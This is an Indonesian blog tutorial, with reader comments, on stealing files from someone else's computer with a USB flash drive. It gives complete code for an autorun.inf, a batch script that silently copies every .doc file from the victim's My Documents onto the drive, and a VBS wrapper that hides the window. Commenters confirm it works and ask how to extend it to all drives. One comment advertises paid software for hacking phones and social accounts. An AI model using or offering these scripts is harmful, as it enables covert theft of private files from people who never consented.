Cara Mencuri file Lewat Flashdisk

 hai,,kali ini saya akan membagi tutorial Tentang Cara Mencuri File Lewat Flasdisk,,INGAT Jangan digunakan Yang Tidak baik,Langsung aja ya,,

Langkah ke-1
Buka Notepad (saya sarankan pake program Notepad++) copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf
Langkah ke-2
Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls
Simpan di flashdisk anda dengan nama:file.bat
Langkah ke-3
Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs
Langkah ke-4
Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat
Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik. Selamat mencoba Semoga artikel tentang Cara Mencuri file Lewat Flashdisk ini ber guna bagi kalian semuanya....

7 Responses so far.

  1. Anonymous says:

    percobaan gagal.. mungkin ad yang kurang atau bagaimana//...
    agan sudah perna pakai?

  2. Muyufar says:

    Saya udah nyoba sendiri and hasilnya berhasil gan, coba lagi aja gan ,mungkin ada scriptnya yang kurang,,,

  3. Anonymous says:

    gan gmn caranya biar yg data yg kena ngga cuman my document/local disk c....terus kalo pengen curi data semua local disk yg bentuknya doc gmn gan cara/scriptnya?

  4. oh, kirain curi file di hp orng lain
    klo sya kmrn beli software di www.DETEKTIF.top itu kak
    bisa nyuri file di hp lain...
    seinget sya ada 19 software, software hack fb, twitter dll...
    pilih yg software Pengambil File di Hp lain
    pas beli bilang aja buat penting & gk disalahgunain, biar diladenin...
    abis itu trserah deh mau dibuat apaan, wkwkwk

  5. Dewi Aja says:

    Perkenalkan, saya dari tim kumpulbagi. Saya ingin tau, apakah kiranya anda berencana untuk mengoleksi files menggunakan hosting yang baru?
    Jika ya, silahkan kunjungi website ini www.kbagi.com untuk info selengkapnya.

    Di sana anda bisa dengan bebas share dan mendowload foto-foto keluarga dan trip, music, video, filem dll dalam jumlah dan waktu yang tidak terbatas, setelah registrasi terlebih dahulu. Gratis :)

  6. Anonymous says:

    keren bro..berhasil...

  7. DrewTeam says:

    Gimana cara nyimpannya gan, nggak ngerti cra nyimpannya

Leave a Reply